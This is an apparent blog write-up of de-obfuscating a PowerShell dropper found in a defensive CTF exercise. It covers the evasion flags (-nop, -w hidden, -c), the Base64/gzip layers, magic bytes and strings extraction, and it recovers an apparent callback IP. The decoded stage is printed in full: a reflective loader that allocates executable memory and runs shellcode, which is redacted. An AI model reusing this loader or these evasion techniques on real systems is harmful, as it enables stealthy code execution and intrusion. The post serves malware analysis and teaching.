Digging into some obfuscated powershell
Recently at an infosec conference I had the opportunity to participate in a defensive CTF style exercise with a few teammates. I told those teammates that I would send them some information on how to de-obfuscate a piece of potentially malicious PowerShell code one of them found during the exercise, so this post is in regard to that.
Apologies for the wall of text, but if you are interested I tried to provide quite a bit of detail.
We saved a piece of PowerShell during the exercise that looked like this, code has been redacted as it is seen as malware by AV, and the full code is not needed for the explination. This was part of a larger powershell script that ran on a comrpmised endpoint in our exercise scenario.
-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOlEZWcCA7VX7W/a{2}hj/Pqn/gzUhYTQ''...[REDACTED]...''vwE4wfSu6QwAAA{0}{0}'')-f''='',''r'',''R'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
This code followed the PowerShell command for execution so originally it looked more like.
powershell.exe -nop -w hidden -c {Rest of the crazy code here}
For starters I wanted to explain the arguments used here.
-nop
This is shorthand for the full argument -NoProfile
and instructs PowerShell to launch without loading user profile scripts.
Scope | Typical Location |
---|---|
Current User, Current Host | $HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 |
Current User, All Hosts | $HOME\Documents\PowerShell\profile.ps1 |
All Users, Current Host | $PSHOME\Microsoft.PowerShell_profile.ps1 |
All Users, All Hosts | $PSHOME\profile.ps1 |
Current/All users is self explanatory, but Hosts in this context may be a bit misleading. When we say hosts here what we really mean is environment or shell. PowerShell can be launched in many ways and although you can access the same functionality from any of these environments they are not the same. This is actually something very important to understand in Security because putting in security measures to do something like block “powershell.exe” does not block running PowerShell using another environment by default.
As an example these are some of the ways you can access PowerShell that would take advantage of different profile script paths as shown above.
- powershell.exe - the classic PowerShell console
- PowerShell ISE - the scripting editor (Integrated Scripting Environment)
- VSCode PowerShell extension - if you’re running PowerShell inside Visual Studio Code
- Custom apps - anything that embeds PowerShell (like certain admin tools)
The important thing to take away from the exercise is the use of -nop
is generally a measure attackers take to try and avoid detection, many admins and security tools will load their own code in these profile scripts to add security hooks or aid in detections by other means, so its in an attackers best interest to avoid those.
-w hidden
Short for -WindowStyle Hidden
.
This does what it says on the tin, it hides the window from the user. Often legitimately used to run background task but also commonly used my malicious scripts so the user does not see a window open on their screen.
-c
Short of -Command
This just tells PowerShell that what follows {Insert crazy code here}
should be run as a PowerShell command. This is not used very often for legitimate purposes because admins will usually save scripts that need to be run and call them directly like powershell.exe -File "C:\path\to\your\script.ps1"
. This is however often used my malicious actors because this executes the script in memory, meaning nothing needs to be saved to the machine directly and no files are created, which also aids in avoiding detection. Luckily most modern antivirus and protection suites have long since adjusted to also look at the computers memory and anything actually malicious is usually picked up, but this is not foolproof.
De-obfuscation
On to the main event. When we are de-obfuscating code there are two ways to go about it, Static (the safest option) or Dynamic (where we actively evaluate parts of the code by running it to see what it does). Static is what we call it when we dissect each part of the code and reversing what has been done to it so we get the full picture without ever needing to run it. Doing a dynamic analysis can speed things up because you are actively running all or parts of the suspicious code to let it reveal itself, but often at the cost of security or even at the risk of missing some of its actions if its doing more than one thing.
Regardless of method, but doubly so for dynamic, I would advise de-obfuscating potentially malicious code only on a safe non-networked lab machine set up for that purpose. I will be using my own personal lab computer to do this work
Dynamic analysis example of running the code:
$secret = ([char]72)+([char]101)+([char]108)+([char]108)+([char]111)
Invoke-Expression $secret
Hello
Static analysis example of just figuring it out:
$secret = ([char]72)+([char]101)+([char]108)+([char]108)+([char]111)
We look up an ASCII table online and compare the character codes shown with the online table.
72 = Uppercase H
101 = Lowercase e
108 = Lowercase l
111 = Lowercase o
So we know it spells out 'Hello'
Often we will need to combine Static and Dynamic to take small shortcuts where we have the experience to know its safe to do so.
Back to our funky code.
When we analyze code we first remove what is junk for our purposes and then we work from the inside out, the innermost expression is evaluated first with each additional operation being applied in an outward manner. In PowerShell
first we will extract just the body of the code an leave the PowerShell arguments behind. Remove the '-nop -w hidden -c &(
from the beginning and remove )';
from the end as they are the matching parenthesis and single quote from the other end.
With that done if you are in a code editor that understand code blocking, like VSCode or something similar it will help you analyze the code because these types of editors will highlight matching pairs of parenthesis or brackets so you know where expressions start and end more easily.
In PowerShell parentheses ()
group expressions and force the evaluation order on from inside to outside. (RunsLast(RunsSecond(InnermostRunsFirst)))
Curly braces {}
normally denote code blocks which can complicate things because that would add the need to diagram execution flow as well, luckily we don’t have a code block in this example but we do have curly braces used in another special case which is one of the first things we need to address in our attempt to de-obfuscate the code.
First lets find out innermost expression, look along the string of code, sometimes its fairly apparent where the center expression is because it contains the bulk of the obfuscated code as some form of encoded string which will look like a long line of unreadable letters and numbers. If its not so obvious then you need to follow the code down the line, in our example we are dealing with multiple expressions encapsulating one another, so we look for the opening of an expression by find the open parenthesis (
marks, and keep going until you hit the closing of an expression with the closed parenthesis )
between these two often denotes the innermost expression.
This innermost expression looks like this.
("H4sIAOlEZWcCA7VX7W/a{2}hj/Pqn/gzUhYTQ"+"CdkNoU2nSzmAXp5gAxibA0HSxz/aFs03sc4Bs/"+"d... [REDACTED] ...h9{1}sSSWme4Pnq/MuDF0P0x0Ewx5QDoQ1jjZHjE+t1JE6V8jLGEB6ohOC0xH+O64KfjeAdWw7W"+"vwE4wfSu6QwAAA{0}{0}")
This part is very straight forward to start, this is a bunch of strings in double quotes being appended to one another to make one large string. so the first thing we do is remove all of the quotes and the string addition operators that are outside of those quotes. Be careful not to remove the +
signs from inside the strings themselves as these are important to the data.
"H4sIAOlEZWcCA7VX7W/a{2}hj/Pqn... [REDACTED] ...ez/7h9{1}sSSWme4Pnq/MuDF0P0x0Ewx5QDoQ1jjZHjE+t1JE6V8jLGEB6ohOC0xH+O64KfjeAdWw7WvwE4wfSu6QwAAA{0}{0}"
Now lets deal with those weird curly brackets, if we look at the next outward expression it shows -f"=","r","R"
. The -f
here means format, and the items in quotes afterwards are the values we will use to format the string. As in many programming languages we index from (start at) 0 when we are counting up. 0, 1, 2, 3, etc. So this format string is telling our computer to replace anything in the special format variable {0}, {1}, {2}
in our crazy long string with the character in that index spot. So anywhere in our string we see {0}
needs to be replaced with =
, {1}
needs to be r
, and {2}
needs to be R
.
Our string after making those updates.
"H4sIAOlEZWcCA7VX7W/aRhj/Pqn... [REDACTED] ...ez/7h9rsSSWme4Pnq/MuDF0P0x0Ewx5QDoQ1jjZHjE+t1JE6V8jLGEB6ohOC0xH+O64KfjeAdWw7WvwE4wfSu6QwAAA=="
This string is a Base64 encoded string, its pretty recognizable to programmers and developers as its mainly used to send and receive data across networks and webservers using a character set that is safe for that type of job.
You don’t need to be able to recognize that on your own though because if we look at our next outward expression we can see that its calling [System.Convert]::FromBase64String
so we know that the next step to to convert from a base64 string. This step would be safe to do dynamically because we are only transforming the data and not executing it. You can also use online tools to convert base64 data, the only thing you want to keep in mind is confidentiality, if you find encoded data someplace like at work, you should never use the internet to decode it because you don’t know what it contains and processing potentially sensitive data on a non-work owned system could reveal information to the public, or a public server owner that you don’t want them to see. Given that Base64 is used commonly in all kinds of applications there is no telling what’s in the data before you decode it, it could have account numbers, usernames, confidential data, you name it.
I will use PowerShell to decode the data and assign it to a new variable for me to look at.
$NewString = [System.Convert]::FromBase64String("H4sIAOlEZWc...{rest of base64 string here}...Su6QwAAA==")
What we get is a very long list of numbers.
$NewString
31
139
8
0
233
68
101
103
2
3
181
87
237
111
218
70
24
255
.
.
.
So now we need to look at our next outward expression New-Object System.IO.MemoryStream()
which PowerShell uses to read an write bytes to a file, but only in memory. So our big list of numbers is a byte array representing a file. This can be a little tricky, bytes represent computer data but this data is not always human readable. So this is not as straight forward as just decoding each number to a letter or number.
To further complicate things, If we look at our next outward expression we see New-Object System.IO.Compression.GzipStream({Our_Byte_String_here}),[System.IO.Compression.CompressionMode]::Decompress
which means the code is using gzip compression to decompress the data we have here. This is essentially a zip file.
Another way to confirm this is a gzip if it were not obvious in code is through the concept of a File Signature, or Magic Bytes as is a common slang for it. Many file types use a byte signature in their header, the first few bytes of a file may denote what kind of file it is and sometimes other information, there is no standard size for a header but magic bytes are generally in the first 8 bytes data. These are usually recognized in hexadecimal in lookup tables so we will convert the values.
If we convert the first 8 numbers to hexadecimal we get the following.
$bytes = 31,139,8,0,233,68,101,103
$hexArray = $bytes | ForEach-Object { $_.ToString("X2") }
$hexArray
1F
8B
08
00
E9
44
65
67
This takes each byte and uses the ToString transform on it where “X” means to convert to hex, and the “2” means to make sure its padded to at least 2 numbers, so we will always get a 0 for padding which gives us numbers like 08
instead of 8
, this is just cleaner as hex is normally formatted as two characters.
If we look up the file signature online for a gzip compressed file we can see that gzip files generally start with 1F 8B
.
Some common magic bytes
File Type | Magic Bytes Size |
---|---|
GZIP | 2 bytes (1F 8B ) |
PNG | 8 bytes (89 50 4E 47 0D 0A 1A 0A ) |
EXE (PE file) | 2 bytes (4D 5A ) |
ZIP | 4 bytes (50 4B 03 04 ) |
JPEG | 2 bytes (FF D8 ) |
If we go ahead an decompress that bytecode blob we can see whats waiting for us.
$NewFile = (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,$NewString)),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
$NewFile
function cCO {
Param ($aJH, $s3Z)
$jR = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $jR.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($jR.GetMethod('GetModuleHandle')).Invoke($null, @($aJH)))), $s3Z))
}
function daVL {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $kbl,
[Parameter(Position = 1)] [Type] $akhY = [Void]
)
$aI = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$aI.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $kbl).SetImplementationFlags('Runtime, Managed')
$aI.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $akhY, $kbl).SetImplementationFlags('Runtime, Managed')
return $aI.CreateType()
}
[Byte[]]$lS = [System.Convert]::FromBase64String("/EiD5P... [REDACTED] ...LWiVv/V")
[Uint32]$tZEE = 0
$fQDR6 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll VirtualAlloc), (daVL @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $lS.Length,0x3000, 0x04)
[System.Runtime.InteropServices.Marshal]::Copy($lS, 0, $fQDR6, $lS.length)
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll VirtualProtect), (daVL @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($fQDR6, [Uint32]$lS.Length, 0x10, [Ref]$tZEE)) -eq $true) {
$fuAm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll CreateThread), (daVL @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$fQDR6,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll WaitForSingleObject), (daVL @([IntPtr], [Int32]))).Invoke($fuAm,0xffffffff) | Out-Null
}
So it turns out our initial PowerShell code was a simple dropper file, meaning it was just a stub program used to build or retrieve other code and run it.
A few things immediately stand out, the bulk of this code is used to find the memory address of native Windows API functions and function pointers, (GetProcAddress
, GetDelegateForFunctionPointer
). We see references to Reflection
, a common technique used by malware and attackers to dynamically load and execute code using the system’s own runtime mechanisms and function calls, often avoiding traditional detection methods.
I will go ahead and tell you that the Base64 string in this section of code is raw assembly shellcode. This is now in the territory of reverse engineering which is far more complicated, but there are still a few things we can quickly look at with the data at hand.
On Linux systems there is a command called strings which will output all of the human readable strings from a binary, if the attacker hardcoded any information into the shellcode, such as url’s or IP addresses, or anything else it will often show up when using strings. We can replicate that behavior in PowerShell without ever writing the binary information to disk.
The below code converts the Base64 string to bytes, and stores it in a variable called Bytes. Then you loop over each byte in that variable and we check if its decimal value falls between 32 and 136 (these are the decimal values for alphanumeric human readable characters), if the value falls in that range we convert it to its human readable character and add it to the variable ascii, if not, we add a space instead. After that is done we split the entire string up by spaces and any line that’s not just a space and at greater than 3 characters we print out as a readable line.
$bytes = [System.Convert]::FromBase64String("/EiD5P... [REDACTED] ...LWiVv/V")
$ascii = -join ($bytes | ForEach-Object {
if ($_ -ge 32 -and $_ -le 126) { [char]$_ } else { ' ' }
})
$asciiStrings = $ascii -split '\s+' | Where-Object { $_.Length -gt 3 }
$asciiStrings
AQAPRH1
QVeH
JJH1
RAQH
AXAX^YZAXAYAZH
XAYZH
wininet
SZM1
11.0.8.101
/oHUt8Ca1NjpMEE0SK3UI-AQle2OsuqZsGykYmBjxup
SZAXM1
PSSI
SYj@ZI
Here we can see what looks like an IP address 11.0.8.101
, likely one controlled by the attacker for the shellcode to call back to, and we can also see another long string /oHUt8Ca1NjpMEE0SK3UI-AQle2OsuqZsGykYmBjxup
that may be nothing but is worth making a note of. Using these values we can use other tools like Splunk and firewalls to further check for and block activity to and from that IP address or look for network calls that might have that wonky string in it as some sort of beacon.
And thats it for now, I have a few older posts on reverse engineering binaries that can give you an idea of what that looks like but we will stop this project here. I hope this information was somewhat useful and a tad bit interesting at the very least.